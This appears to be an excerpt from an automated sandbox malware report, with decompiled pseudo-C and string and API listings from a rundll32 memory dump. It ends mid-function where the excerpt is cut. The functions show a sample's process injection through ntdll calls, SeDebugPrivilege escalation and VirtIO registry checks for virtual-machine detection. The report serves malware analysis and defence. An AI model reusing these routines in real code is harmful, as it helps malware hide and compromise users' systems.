                • Opcode Fuzzy Hash: bf86167c571dfc2279f15b415a5019d1000c7284ff4766e008aa38a0cb6467e3
                • Instruction Fuzzy Hash: 9D71AB33712F30CAEB64DB61A8487DC23A6FFA4B84F15455ADE5A57798DF38C8468380
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: AddressProc$HandleModule
                • String ID: ZwAllocateVirtualMemory$ZwGetContextThread$ZwReadVirtualMemory$ZwSetContextThread$ZwWriteVirtualMemory$ntdll.dll
                • API String ID: 667068680-1731939869
                • Opcode ID: 9ee053719bee77af573e3c090f1fa2f87a55a8d6bb8722cc3d844276aecaba7b
                • Instruction ID: 929901f9018235b64156c3fa8056472978e92af422d34d7712452aa53bdaf5c5
                • Opcode Fuzzy Hash: 9ee053719bee77af573e3c090f1fa2f87a55a8d6bb8722cc3d844276aecaba7b
                • Instruction Fuzzy Hash: 97110D77707F61D5FE66CB14E99C3A427A0AFA8B54FA440A59D0E02359EF7CA448C200
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 59%
                			E00000215215205A05E0(signed int __edx, short __esi, long long __rbx, long long __rcx, void* __r8, void* __r9) {
                				void* __rdi;
                				void* __rsi;
                				void* _t95;
                				void* _t96;
                				signed int _t97;
                				signed int _t98;
                				void* _t107;
                				signed char* _t139;
                				signed char* _t140;
                				long long _t142;
                				void* _t143;
                				long long _t150;
                				void* _t159;
                				signed long long _t162;
                				signed int _t163;
                				long long _t164;
                				void* _t173;
                				signed char* _t174;
                				signed char* _t178;
                				void* _t179;
                				void* _t181;
                				void* _t182;
                				void* _t184;
                				void* _t185;
                				void* _t187;
                				signed char* _t193;
                				void* _t195;
                				void* _t196;
                				void* _t197;
                				void* _t199;
                
                				_t195 = __r9;
                				_t146 = __rbx;
                				_t104 = __edx;
                				 *((long long*)(_t187 + 8)) = __rcx;
                				_t185 = _t187 - 0x37;
                				 *((long long*)(_t185 - 0x21)) = 0xfffffffe;
                				 *((long long*)(_t187 - 0xc0 + 0xf8)) = __rbx;
                				_t182 = __r9;
                				_t197 = __r8;
                				r15d = __edx & 0x0000ffff;
                				if ( *((intOrPtr*)(__r8 + 8)) + 2 - 0xffff <= 0) goto 0x205a06ae;
                				 *((long long*)(_t185 - 0x59)) = 0x206278d0;
                				 *((long long*)(_t185 - 0x51)) = 0x206278d0;
                				 *((long long*)(_t185 - 0x49)) = 0x206278d0;
                				 *(_t185 - 0x69) = "field name too large";
                				 *(_t185 - 0x61) = 1;
                				_t11 = _t185 - 0x51; // -78
                				_t12 = _t185 - 0x69; // -102
                				E00000215215205F7764(__rbx, _t12, _t11, _t178, __r9);
                				 *((long long*)(_t185 - 0x59)) = 0x20627910;
                				 *((long long*)(_t185 - 0x59)) = 0x20627940;
                				 *((long long*)(_t185 - 0x39)) = "D:\\Sources\\boost_1_78_0\\boost/beast/http/impl/fields.hpp";
                				 *(_t185 - 0x31) = "struct boost::beast::http::basic_fields<class std::allocator<char> >::element &__cdecl boost::beast::http::basic_fields<class std::allocator<char> >::new_element(enum boost::beast::http::field,class boost::basic_string_view<char,struct std::char_traits<char> >,class boost::basic_string_view<char,struct std::char_traits<char> >)";
                				 *((long long*)(_t185 - 0x29)) = 0x3c9;
                				_t18 = _t185 - 0x39; // -54
                				_t19 = _t185 - 0x59; // -86
                				_t20 = _t185 - 0x19; // -22
                				E000002152152059FCD0(_t146, _t20, _t19, __r9, _t18, _t199, _t196);
                				_t21 = _t185 - 0x19; // -22
                				E00000215215205F9940(_t146, _t21, 0x2066b800, __r9, _t178);
                				if ( *((intOrPtr*)(_t195 + 8)) + 2 - 0xffff <= 0) goto 0x205a074a;
                				 *((long long*)(_t185 - 0x59)) = 0x206278d0;
                				 *((long long*)(_t185 - 0x51)) = 0x206278d0;
                				 *((long long*)(_t185 - 0x49)) = 0x206278d0;
                				 *(_t185 - 0x69) = "field value too large";
                				 *(_t185 - 0x61) = 1;
                				_t28 = _t185 - 0x51; // -78
                				_t29 = _t185 - 0x69; // -102
                				E00000215215205F7764(_t146, _t29, _t28, _t178, _t182);
                				 *((long long*)(_t185 - 0x59)) = 0x20627910;
                				 *((long long*)(_t185 - 0x59)) = 0x20627940;
                				 *((long long*)(_t185 - 0x39)) = "D:\\Sources\\boost_1_78_0\\boost/beast/http/impl/fields.hpp";
                				_t139 = "struct boost::beast::http::basic_fields<class std::allocator<char> >::element &__cdecl boost::beast::http::basic_fields<class std::allocator<char> >::new_element(enum boost::beast::http::field,class boost::basic_string_view<char,struct std::char_traits<char> >,class boost::basic_string_view<char,struct std::char_traits<char> >)";
                				 *(_t185 - 0x31) = _t139;
                				 *((long long*)(_t185 - 0x29)) = 0x3cd;
                				_t35 = _t185 - 0x39; // -54
                				_t36 = _t185 - 0x59; // -86
                				_t37 = _t185 - 0x19; // -22
                				E000002152152059FCD0(_t146, _t37, _t36, _t182, _t35, _t181, _t184);
                				_t38 = _t185 - 0x19; // -22
                				_t159 = _t38;
                				E00000215215205F9940(_t146, _t159, 0x2066b800, _t182);
                				asm("inc ecx");
                				asm("dec ax");
                				asm("psrldq xmm0, 0x8");
                				asm("dec ax");
                				_t173 = _t159 + _t139;
                				if (_t139 == _t173) goto 0x205a07ab;
                				_t97 =  *_t139 & 0x000000ff;
                				if (_t97 == 0x20) goto 0x205a0775;
                				if (_t97 != 9) goto 0x205a077a;
                				_t140 =  &(_t139[1]);
                				goto 0x205a0763;
                				if (_t140 == _t173) goto 0x205a07ab;
                				_t40 = _t173 - 1; // 0x8e
                				_t193 = _t40;
                				_t98 =  *_t193 & 0x000000ff;
                				if (_t98 == 0x20) goto 0x205a0791;
                				if (_t98 != 9) goto 0x205a0799;
                				_t174 = _t193;
                				goto 0x205a077d;
                				if (_t140 == _t174) goto 0x205a07ab;
                				 *(_t185 - 0x69) = _t140;
                				 *(_t185 - 0x61) = _t174 - _t140;
                				goto 0x205a07b3;
                				 *(_t185 - 0x69) = _t178;
                				 *(_t185 - 0x61) = _t178;
                				asm("movups xmm0, [ebp-0x69]");
                				asm("inc ecx");
                				_t162 = _t159 + 0x41 +  *((intOrPtr*)(_t197 + 8)) >> 3;
                				if (_t162 != 0) goto 0x205a07e0;
                				goto 0x205a081e;
                				_t163 = _t162 * 8;
                				if (_t163 - 0x1000 < 0) goto 0x205a0816;
                				_t142 = _t163 + 0x27;
                				if (_t142 - _t163 > 0) goto 0x205a0800;
                				E00000215215205F5BBC(_t96, _t104, _t142 - _t163, _t142, _t178, _t178);
                				asm("int3");
                				_t164 = _t142;
                				E00000215215205F4DCC(_t142, _t164);
                				_t49 = _t142 + 0x27; // 0x27
                				 *((long long*)((_t49 & 0xffffffe0) - 8)) = _t142;
                				goto 0x205a081e;
                				E00000215215205F4DCC(_t142, _t164);
                				_t150 = _t142;
                				 *((long long*)(_t185 + 0x67)) = _t150;
                				 *((long long*)(_t185 + 0x77)) = _t150;
                				if (_t150 == 0) goto 0x205a08c9;
                				asm("movups xmm1, [esi]");
                				asm("movaps [ebp-0x59], xmm1");
                				asm("inc ecx");
                				asm("movaps [ebp-0x69], xmm0");
                				asm("psrldq xmm0, 0x8");
                				asm("dec cx");
                				 *(_t150 + 0x30) =  &(_t193[2]) & 0x0000ffff;
                				asm("psrldq xmm1, 0x8");
                				asm("dec ax");
                				 *((short*)(_t150 + 0x32)) = __esi;
                				 *((intOrPtr*)(_t150 + 0x34)) = r15w;
                				_t57 = _t150 + 0x38; // 0x5f
                				_t179 = _t57;
                				 *((char*)(_t142 + _t179)) = 0x3a;
                				 *((char*)(_t142 + _t179)) = 0x20;
                				_t143 = _t142 + _t179;
                				 *((char*)(_t164 + _t143)) = 0xd;
                				 *((char*)(_t164 + _t143 + _t179 + 1)) = 0xa;
                				if (_t193 == 0) goto 0x205a08af;
                				E00000215215205F7310( *(_t150 + 0x30) & 0x0000ffff, 0, __esi, _t107, _t179,  *(_t185 - 0x69), _t179, _t182, _t193);
                				if (_t182 == 0) goto 0x205a08cc;
                				_t95 = E00000215215205F7310( *(_t150 + 0x30) & 0x0000ffff, 0, __esi, _t107, _t179 + _t179,  *((intOrPtr*)(_t185 - 0x59)), _t179, _t182, _t182);
                				goto 0x205a08cc;
                				return _t95;
                			}

                APIs
                Strings
                • struct boost::beast::http::basic_fields<class std::allocator<char> >::element &__cdecl boost::beast::http::basic_fields<class std::allocator<char> >::new_element(enum boost::beast::http::field,class boost::basic_string_view<char,struct std::char_traits<char> >, xrefs: 00000215205A0679, 00000215205A0715
                • field value too large, xrefs: 00000215205A06D7
                • field name too large, xrefs: 00000215205A063B
                • D:\Sources\boost_1_78_0\boost/beast/http/impl/fields.hpp, xrefs: 00000215205A066E, 00000215205A070A
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Exception$Throw__std_exception_copy$Concurrency::cancel_current_taskFileHeaderRaisestd::bad_alloc::bad_alloc
                • String ID: D:\Sources\boost_1_78_0\boost/beast/http/impl/fields.hpp$field name too large$field value too large$struct boost::beast::http::basic_fields<class std::allocator<char> >::element &__cdecl boost::beast::http::basic_fields<class std::allocator<char> >::new_element(enum boost::beast::http::field,class boost::basic_string_view<char,struct std::char_traits<char> >
                • API String ID: 4177371363-3821157088
                • Opcode ID: b5c6b7291967ff78ddf1fb764eec95435b1af2d7f8bf929ea062b2a5d0d25207
                • Instruction ID: 4d53998d6f62f14de6e3ead478678346cf7ce46251d758fb91a7f6284c551498
                • Opcode Fuzzy Hash: b5c6b7291967ff78ddf1fb764eec95435b1af2d7f8bf929ea062b2a5d0d25207
                • Instruction Fuzzy Hash: 04919A33B12FA1D9EB10CBA4E4483EC33F6EFA4758F405566DE4C26799EA389195C380
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: AddressCloseHandleProc$CurrentLibraryLoadLookupPrivilegeProcessValue
                • String ID: AdjustTokenPrivileges$Advapi32.dll$OpenProcessToken$SeDebugPrivilege
                • API String ID: 1752774111-261832459
                • Opcode ID: feb6192630000d6d9ed8c5f6f6389c402362fe7abc154ea2706b159974cd1c3a
                • Instruction ID: 8a2e9f38fe2b745b13166917ea794423e73b92d4817b0b6cbe43d0b956a30ed5
                • Opcode Fuzzy Hash: feb6192630000d6d9ed8c5f6f6389c402362fe7abc154ea2706b159974cd1c3a
                • Instruction Fuzzy Hash: 42211973216F40C6DB54CB61F84869AB3A0FBD8B94F50406AEE8E43B6CDE78D548CB00
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 27%
                			E00000215215205CAB8C(intOrPtr __ecx, long long* __rax, long long __rbx, long long* __rdx, long long __rdi, long long __rsi, long long* __r8, long long _a8, long long _a16, long long _a24, long long _a32) {
                				void* _v40;
                				intOrPtr _v64;
                				long long _v72;
                				long long _v80;
                				intOrPtr _v88;
                				void* _v96;
                				long long _v104;
                				long long _v120;
                				intOrPtr _v128;
                				intOrPtr _v136;
                				void* __rbp;
                				intOrPtr _t38;
                				void* _t43;
                				void* _t54;
                				intOrPtr _t55;
                				void* _t57;
                				long long* _t63;
                				void* _t89;
                				long long* _t98;
                				long long* _t99;
                
                				_t86 = __rsi;
                				_t64 = __rbx;
                				_t63 = __rax;
                				_t49 = __ecx;
                				_a8 = __rbx;
                				_a16 = __rsi;
                				_a24 = __rdi;
                				_t99 = __r8;
                				_t98 = __rdx;
                				_a32 = __rbx;
                				_t55 = __ecx;
                				_v96 = __rbx;
                				_v88 = 0;
                				_t7 = _t64 + 0x28; // 0x28
                				r8d = _t7;
                				E00000215215205F8EF0(__ecx, 0, _t54, _t57,  &_v80, __rdx, __rdi, __r8);
                				_v104 = __rbx;
                				GetModuleHandleW(??);
                				GetProcAddress(??, ??);
                				GetProcAddress(??, ??);
                				GetProcAddress(??, ??);
                				_v104 = _t55;
                				_v88 = 0x30;
                				_v120 = __rsi;
                				asm("xorps xmm0, xmm0");
                				_v128 = 0x8000000;
                				_v80 = __rsi;
                				_t17 = _t86 + 0x40; // 0x40
                				_t38 = _t17;
                				_v72 = __rsi;
                				_v64 = _t38;
                				_v136 = _t38;
                				asm("movdqu [ebp-0x10], xmm0");
                				if ( *_t63() < 0) goto 0x205cacaa;
                				GetCurrentProcess();
                				if (E00000215215205CAA5C(_t63, _t63, _a32, _t63, _t89,  &_v96) != 0) goto 0x205cacb1;
                				r8d = _v104;
                				E00000215215205F8EF0(_t49, 0, _t54, _t57, _v96, _t63, _t63,  &_v96);
                				 *_t98 = _v96;
                				if (_t99 == 0) goto 0x205cacb1;
                				 *_t99 = _a32;
                				goto 0x205cacb5;
                				_t43 =  *_t63();
                				if (_a32 == 0) goto 0x205cacc2;
                				if (_t99 != 0) goto 0x205cacc2;
                				 *_t63();
                				return _t43;
                			}

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: AddressProc$HandleModule$CurrentProcess
                • String ID: 0$NtCreateSection$RtlNtStatusToDosError$ZwClose$ntdll.dll
                • API String ID: 1077269151-3111467594
                • Opcode ID: 16a1abb4dc548e0d1cc2f6da75aa4cf92c6f4bc6f3588bd7fbc56282c6eca6d6
                • Instruction ID: 069878c7f5128f07750288dc17d1482df866318365342ffa6ab586dd5ade231c
                • Opcode Fuzzy Hash: 16a1abb4dc548e0d1cc2f6da75aa4cf92c6f4bc6f3588bd7fbc56282c6eca6d6
                • Instruction Fuzzy Hash: 18413C33B12B21CAE750DF62E8486D93BB4FB98B98F644126EE4A53B48DF35C845C740
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 61%
                			E00000215215205CF2F0(void* __eflags, signed int __rbx, void* __rdx, long long __rsi, long long _a8, long long _a16) {
                				void* _v8;
                				signed int _v24;
                				char _v536;
                				long long _v544;
                				long long _v552;
                				long long _v560;
                				long long _v568;
                				long long _v576;
                				long long _v584;
                				long long _v592;
                				char _v600;
                				long long _v616;
                				void* __rdi;
                				void* _t32;
                				void* _t35;
                				void* _t37;
                				signed long long _t42;
                				void* _t63;
                				void* _t67;
                				signed long long _t68;
                				void* _t70;
                
                				_a8 = __rbx;
                				_a16 = __rsi;
                				_t68 = _t67 - 0x280;
                				_t42 =  *0x2067c720; // 0xca1645d940e
                				_v24 = _t42 ^ _t68;
                				_v592 = L"SYSTEM\\ControlSet001\\Services\\vioscsi";
                				_v584 = L"SYSTEM\\ControlSet001\\Services\\viostor";
                				_v576 = L"SYSTEM\\ControlSet001\\Services\\VirtIO-FS Service";
                				_v568 = L"SYSTEM\\ControlSet001\\Services\\VirtioSerial";
                				_v560 = L"SYSTEM\\ControlSet001\\Services\\BALLOON";
                				_v552 = L"SYSTEM\\ControlSet001\\Services\\BalloonService";
                				_v544 = L"SYSTEM\\ControlSet001\\Services\\netkvm";
                				r8d = 0x200;
                				E00000215215205F8EF0(_t32, 0, _t35, _t37,  &_v536, __rdx, _t63, _t70);
                				E00000215215205CD1D0(_t32, L"SYSTEM\\ControlSet001\\Services\\netkvm",  &_v536, __rdx, L"Checking reg key %s ",  *((intOrPtr*)(_t68 + 0x38 + __rbx * 8)));
                				_v600 = __rsi;
                				r9d = 0x20019;
                				_v616 =  &_v600;
                				r8d = 0;
                				if (RegOpenKeyExW(??, ??, ??, ??, ??) == 0) goto 0x205cf3d9;
                				if (__rbx + 1 - 7 < 0) goto 0x205cf370;
                				goto 0x205cf3e9;
                				RegCloseKey(??);
                				return E00000215215205F59D0(_t32, _v24 ^ _t68,  *((intOrPtr*)(_t68 + 0x38 + __rbx * 8)),  *((intOrPtr*)(_t68 + 0x38 + __rbx * 8)));
                			}

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: CloseOpen
                • String ID: Checking reg key %s $SYSTEM\ControlSet001\Services\BALLOON$SYSTEM\ControlSet001\Services\BalloonService$SYSTEM\ControlSet001\Services\VirtIO-FS Service$SYSTEM\ControlSet001\Services\VirtioSerial$SYSTEM\ControlSet001\Services\netkvm$SYSTEM\ControlSet001\Services\vioscsi$SYSTEM\ControlSet001\Services\viostor
                • API String ID: 47109696-2595593112
                • Opcode ID: 8af4a12c27319ba11f01b608c6b82ca4e8bae16d677a2041f257da2fc04e1624
                • Instruction ID: 5da5372c956a2b13178e3ebba1aa92c4702f050db94120b2411fb86c8a8b5bd5
                • Opcode Fuzzy Hash: 8af4a12c27319ba11f01b608c6b82ca4e8bae16d677a2041f257da2fc04e1624
                • Instruction Fuzzy Hash: 0F314D37216FA0D5E6608B11F4882CA73A8FBD8794F604166EE8E47B68DF38D105CB40
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 27%
                			E00000215215205C9E18(long long __rbx, void* __rcx, long long __rdx, long long __r8, void* __r9, long long _a8, void* _a16, long long _a24, intOrPtr _a40) {
                				long long _v64;
                				void* _v72;
                				char _v80;
                				char _v88;
                				char _v96;
                				char _v104;
                				signed int _v120;
                				void* __rdi;
                				void* __rsi;
                				void* __rbp;
                				void* _t65;
                				intOrPtr _t69;
                				char _t70;
                				void* _t71;
                				intOrPtr _t93;
                				void* _t95;
                				void* _t106;
                				long long _t112;
                				signed long long _t115;
                				long long* _t119;
                				long long _t120;
                				intOrPtr* _t128;
                				void* _t148;
                				long long _t154;
                				long long _t157;
                				intOrPtr _t158;
                				void* _t160;
                				long long _t168;
                				void* _t171;
                				void* _t172;
                				void* _t173;
                				void* _t175;
                				void* _t179;
                
                				_t170 = __r9;
                				_t120 = __rbx;
                				_a8 = __rbx;
                				_a24 = __r8;
                				_a16 = __rdx;
                				_t112 =  *((intOrPtr*)(__rcx + 8));
                				_v96 = __rdx;
                				_t179 = __rcx;
                				_t172 = __r9;
                				_a16 = __rdx;
                				_v104 = __rdx;
                				r12d =  *((intOrPtr*)(__rcx + 0x24));
                				_v72 = __rdx;
                				_v80 = __rdx;
                				_v88 = __rdx;
                				_v64 = _t112;
                				_a40 =  *((intOrPtr*)(__rcx + 0x14));
                				if (_t112 != 0) goto 0x205c9e7c;
                				goto 0x205ca0b6;
                				_t113 =  *0x20674e7c;
                				r14d =  *( *0x20674e7c + "is program cannot be run in DOS mode.\r\r\n$");
                				r14d = r14d + 0xfff;
                				r14d = r14d & 0xfffff000;
                				if (E00000215215205CAB8C(_t173 + 0x2578,  *0x20674e7c, __rbx,  &_v96, _t154, _t157,  &_v80) != 0) goto 0x205ca069;
                				if (E00000215215205CAA5C( *0x20674e7c, _t120, _v80, _t172, _t160,  &_a16) != 0) goto 0x205ca069;
                				r9d = 0;
                				_v120 = _v120 & 0;
                				if (E00000215215205CACE8(0,  *0x20674e7c, _t120, _v96, 0x20674e40, _t157, _t160, _a16, _t170, _t171) != 0) goto 0x205ca069;
                				_t93 = _a40;
                				r12d =  ==  ? _t93 : r12d;
                				_t65 = E00000215215205CAB8C(r12d, _t113, _t120,  &_v104, _t154, _t157,  &_v88);
                				_t158 = _v88;
                				if (_t65 != 0) goto 0x205ca065;
                				_t168 =  &_v72;
                				if (E00000215215205CAA5C(_t113, _t120, _t158, _t172, _t160, _t168) != 0) goto 0x205ca065;
                				r8d = _t93;
                				E00000215215205F7310(r12d, _t93, 0, _t95, _v104, _v64, _v104, _t158, _t168);
                				_t128 = _t179 + 0x28;
                				r8d = 0;
                				r13d = r14d;
                				_t175 = _v96 + _t172;
                				 *((long long*)(_t175 + 0x150)) = _a16;
                				 *((long long*)(_t175 + 0x28)) = _t168;
                				_t115 = _v72;
                				 *(_t175 + 0x30) = _t115;
                				 *((intOrPtr*)(_t175 + 0x40)) =  *((intOrPtr*)(_t179 + 0x18));
                				 *((intOrPtr*)(_t175 + 0x38)) = r8d;
                				 *((intOrPtr*)(_t175 + 0x3c)) = r12d;
                				_t69 =  *((intOrPtr*)(_t179 + 0x1c));
                				 *((intOrPtr*)(_t175 + 0x44)) = _t69;
                				if ( *((intOrPtr*)(_t128 + (_t115 | 0xffffffff) + 1)) != r8b) goto 0x205c9f91;
                				if (_t69 == 0) goto 0x205c9fb1;
                				_t148 = _t175 + 0x50 - _t128;
                				_t70 =  *_t128;
                				 *((char*)(_t148 + _t128)) = _t70;
                				if (_t70 != 0) goto 0x205c9fa5;
                				_t71 = E00000215215205C9CF0((_t115 | 0xffffffff) + 1, _t120, _t175, _t158);
                				_t106 = _t71;
                				if (_t106 != 0) goto 0x205ca069;
                				_t50 = _t148 + 0x40; // 0x80
                				r8d = _t50;
                				asm("movups xmm0, [ecx]");
                				asm("movups [eax], xmm0");
                				asm("movups xmm1, [ecx+0x10]");
                				asm("movups [eax+0x10], xmm1");
                				asm("movups xmm0, [ecx+0x20]");
                				asm("movups [eax+0x20], xmm0");
                				asm("movups xmm1, [ecx+0x30]");
                				asm("movups [eax+0x30], xmm1");
                				asm("movups xmm0, [ecx+0x40]");
                				asm("movups [eax+0x40], xmm0");
                				asm("movups xmm1, [ecx+0x50]");
                				asm("movups [eax+0x50], xmm1");
                				asm("movups xmm0, [ecx+0x60]");
                				asm("movups [eax+0x60], xmm0");
                				_t119 = _t175 + 0x168 + _t168;
                				asm("movups xmm1, [ecx+0x70]");
                				asm("movups [eax-0x10], xmm1");
                				if (_t106 != 0) goto 0x205c9fd8;
                				GetModuleHandleW(??);
                				if (_t119 == 0) goto 0x205ca069;
                				GetProcAddress(??, ??);
                				_v120 = _v120 & 0x00000000;
                				r9d = 0;
                				 *_t119();
                				goto 0x205ca069;
                				if (_v96 == 0) goto 0x205ca083;
                				GetCurrentProcess();
                				E00000215215205CAB18();
                				if (_v80 == 0) goto 0x205ca092;
                				CloseHandle(??);
                				if (_v104 == 0) goto 0x205ca0a8;
                				GetCurrentProcess();
                				E00000215215205CAB18();
                				if (_t158 == 0) goto 0x205ca0b6;
                				CloseHandle(??);
                				return _t71;
                			}

                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID: NtQueueApcThread$is program cannot be run in DOS mode.$$ntdll.dll
                • API String ID: 0-1695160815
                • Opcode ID: 72dd9db284d4b49726d962a1c0c1ae00b7df737b2805ddc23eb7aca9e6c6e65f
                • Instruction ID: 437e12982ba2bf52c2ca0f074d6214f6dbee9d127a19d5c0d0aa1a2bafed5588
                • Opcode Fuzzy Hash: 72dd9db284d4b49726d962a1c0c1ae00b7df737b2805ddc23eb7aca9e6c6e65f
                • Instruction Fuzzy Hash: 6F81AE73B02F61CAEB11CF6998486EC3BA4FBA8BACF109155EE0853759EB35D585C340
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E000002152152060DCCC(void* __edx, char* __r8, void* __r9) {
                				void* _t7;
                				signed long long _t11;
                				signed long long _t12;
                				void* _t16;
                				void* _t18;
                
                				_t17 = _t18 - 0x4f;
                				_t19 = _t18 - 0xc0;
                				_t11 =  *0x2067c720; // 0xca1645d940e
                				_t12 = _t11 ^ _t18 - 0x000000c0;
                				 *(_t18 - 0x4f + 0x3f) = _t12;
                				if (__r9 - _t12 + 4 >= 0) goto 0x2060dd18;
                				 *__r8 = 0;
                				return E00000215215205F59D0(_t7,  *(_t17 + 0x3f) ^ _t19, _t16, __r8);
                			}

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: _invalid_parameter_noinfo
                • String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
                • API String ID: 3215553584-2617248754
                • Opcode ID: 4cb90ac43a2d371ea456af3117a8e3444dba1b3e1e03e2e308f5dc0d4b1960e1
                • Instruction ID: 00bc1c97df67c10cadf34163beebdbf2a3a6654af730083f52334ebfee34d1bb
                • Opcode Fuzzy Hash: 4cb90ac43a2d371ea456af3117a8e3444dba1b3e1e03e2e308f5dc0d4b1960e1
                • Instruction Fuzzy Hash: 60418D72702F64C9EB24CF25E8457CA33A5FB69798F104266EE5807B99DA39D025C340
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: AddressProc$HandleModuleProtectVirtual
                • String ID: SleepEx$UD3"$WriteProcessMemory$kernel32.dll
                • API String ID: 2492872976-2122506030
                • Opcode ID: 651551820492fda76c1d478d2c51d60894c219e5e0759cfa3eb3978a16a51996
                • Instruction ID: 1d6858da6c3bd72e80ae7d9078875cbee802dcedb09b1fcd84cd34b4ae26e909
                • Opcode Fuzzy Hash: 651551820492fda76c1d478d2c51d60894c219e5e0759cfa3eb3978a16a51996
                • Instruction Fuzzy Hash: DD218972B12A20CDEB20CF62E8086DD3B64F7A9BD8F540125DE4C17B58EB38C6858B40
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 33%
                			E00000215215205C9CF0(long long __rax, long long __rbx, void* __rcx, long long __rsi, long long _a8, long long _a16) {
                				void* _t16;
                				void* _t17;
                				void* _t18;
                				long long _t27;
                				long long _t29;
                				void* _t44;
                				void* _t51;
                				void* _t52;
                
                				_t27 = __rax;
                				_a8 = __rbx;
                				_a16 = __rsi;
                				_t16 =  *0x206832d0 - _t44; // 0x0
                				if (_t16 == 0) goto 0x205c9d23;
                				_t17 =  *0x206832d8 - _t44; // 0x0
                				if (_t17 == 0) goto 0x205c9d23;
                				_t18 =  *0x206832e0 - _t44; // 0x0
                				if (_t18 != 0) goto 0x205c9de4;
                				GetModuleHandleW(??);
                				_t29 = __rax;
                				if (__rax == 0) goto 0x205c9e06;
                				GetModuleHandleW(??);
                				if (__rax == 0) goto 0x205c9e06;
                				E00000215215205CA2DC(__rax, __rax, __rax, "LdrLoadDll", _t51, _t52);
                				 *0x206832d0 = _t27;
                				if (_t27 == 0) goto 0x205c9e06;
                				E00000215215205CA2DC(_t27, _t29, _t29, "LdrGetProcedureAddress", _t51, _t52);
                				 *0x206832d8 = _t27;
                				if (_t27 == 0) goto 0x205c9e06;
                				E00000215215205CA2DC(_t27, _t29, _t29, "ZwProtectVirtualMemory", _t51, _t52);
                				 *0x206832e0 = _t27;
                				if (_t27 == 0) goto 0x205c9e06;
                				E00000215215205CA2DC(_t27, _t29, _t29, "RtlAnsiStringToUnicodeString", _t51, _t52);
                				 *0x206832e8 = _t27;
                				if (_t27 == 0) goto 0x205c9e06;
                				E00000215215205CA2DC(_t27, _t29, _t29, "RtlFreeUnicodeString", _t51, _t52);
                				 *0x206832f0 = _t27;
                				if (_t27 == 0) goto 0x205c9e06;
                				asm("movups xmm0, [0xb94e5]");
                				asm("movups [esi], xmm0");
                				asm("movups xmm1, [0xb94eb]");
                				asm("movups [esi+0x10], xmm1");
                				asm("movsd xmm0, [0xb94ef]");
                				asm("movsd [esi+0x20], xmm0");
                				return 0;
                			}

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: HandleModule
                • String ID: LdrGetProcedureAddress$LdrLoadDll$RtlAnsiStringToUnicodeString$RtlFreeUnicodeString$ZwProtectVirtualMemory$kernel32.dll$ntdll.dll
                • API String ID: 4139908857-3936008073
                • Opcode ID: c5a052427b3ec778cdb5bb9aa685819040ed37b6c136b296b2a08f91c9af0b8e
                • Instruction ID: efe8b370040ecc74d3fabaa576266a8d97d9c3a114eec12ec5e6e7f0d7c8a0df
                • Opcode Fuzzy Hash: c5a052427b3ec778cdb5bb9aa685819040ed37b6c136b296b2a08f91c9af0b8e
                • Instruction Fuzzy Hash: BF312A33703F75C1FA61CB25A89D3D063A4AFF4760F5852A59D4D062AAEF78E685C240
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 41%
                			E00000215215205BA9E0(void* __ebx, void* __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags, long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, void* __rbp, intOrPtr* __r8, long long __r9, long long __r14, char _a40) {
                				void* _v8;
